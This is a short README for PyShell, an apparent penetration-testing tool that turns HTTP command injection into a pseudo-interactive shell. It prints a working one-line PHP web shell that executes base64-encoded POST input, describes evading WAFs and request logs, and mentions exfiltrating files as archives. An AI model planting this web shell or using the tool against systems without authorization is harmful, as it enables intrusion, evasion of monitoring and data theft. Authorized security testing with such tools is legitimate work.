praetorian-inc / pyshell

PyShell makes interacting with web-based command injection less painful, emulating the feel of an interactive shell as much as possible.
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PyShell - Shellify Your HTTP Command Injection!

Firewall got you down? Are your reverse-shell connection attempts being filtered? Are you stuck working solely over HTTP / HTTPS? Then this just might be just the thing for you.

PyShell exists to make interacting with web-based command injection less painful. The goal is to make it feel as much like an interactive shell as possible. Commands are base-64 encoded to help deal with WAFs, and are submitted as POST requests to be less visible in request logs.

Usage is python3 URL where URL points to a script which performs the command injection, something like this:

<?php $r=base64_decode($_POST['cmd']).' '.base64_decode($_POST['opts']); echo `$r` ?>

The server-side script should accept the following parameters:






Note that you only get output when the command you run exits. Interactive commands are also unsupported, for reasons that should be obvious -- although if you ever forget why while using PyShell, we'll consider that a success!

To change the timeout parameter passed with each command, run settimeout n. It defaults to 20. Unless you handle the timeout parameter server side, it does exactly nothing.

Your command-history is located in ~/.pyshellhistory.

When exfiltrating data, a tgz file will be created in the downloads subdirectory (which will be created as needed). If you do not have permission to read a file, the file will simply be omitted in the downloaded archive.